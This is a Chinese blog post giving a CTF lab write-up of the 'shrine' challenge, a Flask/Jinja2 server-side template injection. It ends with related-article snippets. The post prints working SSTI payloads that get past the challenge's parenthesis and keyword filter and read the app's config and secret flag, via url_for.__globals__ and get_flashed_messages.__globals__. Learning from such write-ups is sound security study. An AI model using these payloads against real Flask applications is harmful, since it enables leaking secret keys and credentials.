攻防世界web进阶shrine笔记

最新推荐文章于 2022-08-09 21:50:00 发布
最新推荐文章于 2022-08-09 21:50:00 发布
阅读量203 收藏
点赞数 1
分类专栏: ctf 学习笔记 文章标签: flask web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49762339/article/details/112759018
版权

攻防世界web进阶shrine

考点:flask模板注入漏洞

①访问目标网站

发现一串代码

②将主页代码格式化后加上注释:

import flask 
import os 
app = flask.Flask(__name__) #定义网页
app.config['FLAG'] = os.environ.pop('FLAG') #将config中的FLAG修改成os.environ.pop['FALG']

@app.route('/') #网站根地址
    def index(): 
        return open(__file__).read()#打开__file)__也就是我们看到的代码

@app.route('/shrine/') #网站地址/shrine
def shrine(shrine): 
    def safe_jinja(s): #定义一个安全检查机制
        s = s.replace('(', '').replace(')', '')#把s字符串中的小括号给置空 
        blacklist = ['config', 'self'] #设置一个黑名单字典
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s #把黑名单中的全部过滤掉
    return flask.render_template_string(safe_jinja(shrine)) #返回执行的过滤函数
if __name__ == '__main__': 
    app.run(debug=True)

③页面访问

经过上述分析我们只需要访问http://220.249.52.134:41339/shrine/ ,从中获取FLAG
然而我们访问:
在这里插入图片描述
它显示not found不要着急,我去看了看大佬的题解发现shrine是需要传参的:
在这里插入图片描述
于是访问:http://220.249.52.134:41339/shrine/kiki发现他回显了kiki
在这里插入图片描述

④注入分析

查看这里会不会存在注入。于是将参数kiki改为{{1+1}}
在这里插入图片描述
这里成功返回2,从而确信这里存在注入。
PS:(问什么使用{{}},因为在flask模板中html通过{{}}解析python代码发送的数据)

⑤绕过过滤

但是传入的值过滤了:’(’ 、’)’、 ‘config’、 'self’看了大佬的题解,了解到python有一些内置函数,比如url_forget_flashed_messages
于是访问http://220.249.52.134:41339/shrine/{{url_for.__globals__}}
在这里插入图片描述
⑤全局对象有一个当前app,访问:http://220.249.52.134:41339/shrine/{{url_for.__globals__['current_app'].config}}
在这里插入图片描述
这有个疑问,为什么config没有被过滤?
访问http://220.249.52.134:41339/shrine/{{get_flashed_messages.__globals__['current_app'].config}}也可以

遗留知识点:Flask框架中的url_forget_flashed_messages

k_i_k_i
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【学习笔记18】buu [WesternCTF2018]shrine
weixin_43553654的博客
05-18 407
打开网站,查看源码看到下面的一串代码 import flask//flask模板,首先就想到了想到了之前我写的一篇flask模板ssti逃逸 import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG')//注册了一个名为FLAG的config,这里基本可以确定是flag。 @app.route('...
07_Flask闪现 get_flashed_messages()
coderge's CSDN Blog.
04-24 2781
文章目录1 在模板中获取闪现信息1.1 简单的在模板中实现获取闪现信息1.2 模板中的分类闪现1.3 模板中过滤闪现消息2 在视图中获取闪现信息2.1 简单的在是视图中获取闪现信息2.2 在视图中实现分类获取闪现信息。 插图:恶搞图05 1 在模板中获取闪现信息 Flask 提供了一个非常简单的方法来使用闪现系统向用户反馈信息。闪现系统使得在一个请求结束的时候记录一个信息,然后在且仅仅在下一个请求中访问这个数据,强调flask闪现是基于flask内置的session的,利用浏览器的session缓存闪现信
SSTI漏洞学习(下)——Flask/Jinja模板引擎的相关绕过
MachineGunJoe666
08-03 879
0x01 再看寻找Python SSTI攻击载荷的过程 获取基本类 对于返回的是定义的Class内的话: __dict__ //返回类中的函数和属性,父类子类互不影响 __base__ //返回类的父类 python3 __mro__ //返回类继承的元组,(寻找父类) python3 __init__ //返回类的初始化方法 __subclasses__() //返回类中仍然可用的引用 python3 __globals__ //对包含函数全局变量的字典的引用 python3....
SSTI 模板注入url_for和get_flashed_messages之[WesternCTF2018]shrine
最新发布
qq_58970968的博客
08-09 587
我们在访问一个网址的时候在调用flask项目的时候需要调用的是一段具体的代码,也就是一个python类或者python函数,在这里这个python类我们称之为视图类,python函数我们称之为视图函数。
ssti模板注入总结
weixin_44576725的博客
04-14 1305
模板注入总结 介绍 模板引擎 模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。 原理 服务端模板注入和常见Web注入的成因一样,也是**服务端接收了用户的输入,将未过滤的数据传给引擎解析,在进行目标编译渲染的过程中,执行了用户插入的恶意内容
shrine-webdav:提供用于Shrine的简单WebDAV存储
05-11
gem 'shrine-webdav' 用法 假设您具有报告模型,该模型应该能够将数据存储在远程WebDAV存储中。 class Report < ApplicationRecord end # == Schema Information # # Table name: reports # # id :uuid not ...
react-shrine:使用React构建的“ Shrine”渐进式Web应用程序示例
02-05
该项目是通过。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。 目录 更新到新版本 Create React App分为两个包: create-react-app是用于创建新项目的全局命令行实用程序。...
shrine.cr:适用于Crystal应用程序的文件附件工具包。 受神殿Ruby启发
02-05
Shrine.cr是一个专门为Crystal编程语言设计的文件附件处理库,灵感来源于Ruby社区中的 Shrine 框架。这个库提供了一套全面的解决方案,用于在Crystal应用程序中上传、存储和管理文件,同时也支持多种ORM适配器,使得...
shrine-commerce
04-04
"shrine-commerce" 是一个基于 Flutter 和 Dart 技术构建的电子商务项目,旨在提供一个用于学习和实践 MDC-100 系列代码实验室的平台。在这个项目中,你可以深入理解如何用 Flutter 构建现代化的购物应用,同时熟悉 ...
Shrine View-crx插件
04-07
谷歌地图以其强大的地理信息系统闻名,能够提供高清的卫星图片,让用户仿佛置身于高空俯瞰世界各地。"Shrine View-crx"利用这一特性,从超过5000个不同的日本神社中随机选取一个展示,让每一次的新标签页打开都充满...
攻防世界web进阶shrine
gongjingege的博客
07-31 553
打开链接,查看源码 代码审计 看见了flask,考虑模板注入,@app.route后跟着路径,还有一部分过滤 试一下 /shrine/{{1+1}},回显为2,确实是ssti app.config['FLAG'] = os.environ.pop('FLAG') 注册了一个config,flag应该就在这里面,本来可以直接查看{{config}},但后面代码存在过滤 def safe_jinja(s): s = s.replace('(', '').replace(')', '')
BUUCTF刷题记录(3)
bmth666的博客
03-20 3285
web [SWPU2019]Web1 [ASIS 2019]Unicorn shop [ACTF2020 新生赛]Include [安洵杯 2019]easy_web [WesternCTF2018]shrine [ACTF2020 新生赛]Exec [GXYCTF2019]禁止套娃 方法一:array_flip()和array_rand() 方法二:array_reverse() 方法三:使用session [GXYCTF2019]BabySQli [CISCN 2019 初赛]Love Math
flask 关于 url_for的两种方式解析
qq_40261822的博客
10-24 1522
url_for 的两种方式 &lt;a  herf={{url_for("admin.news_li",news_id=news.id)}}&gt; &lt;/a&gt;     url的请求相当于: admin/news_li/1   后端取值    request.args.get("news_id")         &lt;a herf={{url_for("admin.ne...
攻防世界shrine 模板注入
qq_43774856的博客
12-16 307
shrine 打开链接,这里直接给出了源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3368
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行,但是题目过滤的不够严格导致.
SSTI模板注入绕过(进阶篇)
热门推荐
羽的博客
12-11 1万+
文章目录语法变量过滤器总结获取内置方法 以chr为例字符串构造获取键值或下标获取属性 下面的内容均以jinja2为例,根据官方文档来探寻绕过方法 文档链接 默认大家都已经可以利用没有任何过滤的模板注入 语法 官方文档对于模板的语法介绍如下 {% ... %} for Statements {{ ... }} for Expressions to print to the template output {# ... #} for Comments not included in the templat
第五十三题——[WesternCTF2018]shrine
分享简单的安全技术
04-29 253
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,看到源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>')
BUUCTF [WesternCTF2018]shrine
qq_42812036的博客
02-15 2450
[WesternCTF2018]shrine模板注入 题目打开查看源码,给的python代码,看到flask,想到模板注入 可以这样测试: 看源码app.config['FLAG'] = os.environ.pop('FLAG') 推测{{config}}可查看所有app.config内容,但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 不过python还有一些内置函数,...
攻防世界 shrine 解题思路
xj28555的博客
07-15 2247
进入题目 发现一串源代码,但是不规则,所以我们ctrl+u查看源代码 这样就整理好了代码,接下来就是审计代码了。我们来看看这个代码都写了啥。 首先导入了两个模块,一个flask,一个os。 然后用app.route装饰器传了两个路径 那我们访问一下这个路径 发现shrine后面的内容会被显示到浏览器上,那我我们可以试试是否存在模板注入构造payload /shrine/{{2*2}} 发现进行了运算,那么可以判断这里是存在SSTI的。关于SSTI模板注入前面也碰到了不
python的web框架的tornado和flask模块注入
qq_53099802的博客
05-19 502
tornado的render模块注入和flask注入

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值